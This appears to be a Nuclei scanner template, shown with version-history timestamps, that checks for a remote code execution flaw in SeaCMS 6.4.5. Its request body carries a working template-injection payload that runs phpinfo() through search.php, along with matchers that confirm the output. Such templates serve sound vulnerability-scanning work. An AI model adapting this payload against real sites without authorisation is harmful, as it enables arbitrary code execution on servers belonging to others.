nuclei-templates/vulnerabilities/other/seacms-rce.yaml

29 lines
684 B
YAML
Raw Normal View History

2021-02-18 13:05:35 +00:00
id: seacms-rce
2021-02-18 13:05:35 +00:00
info:
name: SeaCMS V6.4.5 RCE
author: pikpikcu
severity: high
2021-10-26 12:29:20 +00:00
description: A vulnerability in SeaCMS allows remote unauthenticated attackers to execute arbitrary PHP code.
reference:
- https://mengsec.com/2018/08/06/SeaCMS-v6-45前台代码执行漏洞分析/
2021-02-18 13:05:35 +00:00
tags: seacms,rce
requests:
- method: POST
path:
- '{{BaseURL}}/search.php?searchtype=5'
body: "searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}"
matchers-condition: and
matchers:
- type: word
words:
- "phpinfo"
- "PHP Version"
2021-02-18 15:08:50 +00:00
condition: and
2021-02-18 13:05:35 +00:00
part: body
- type: status
status:
- 200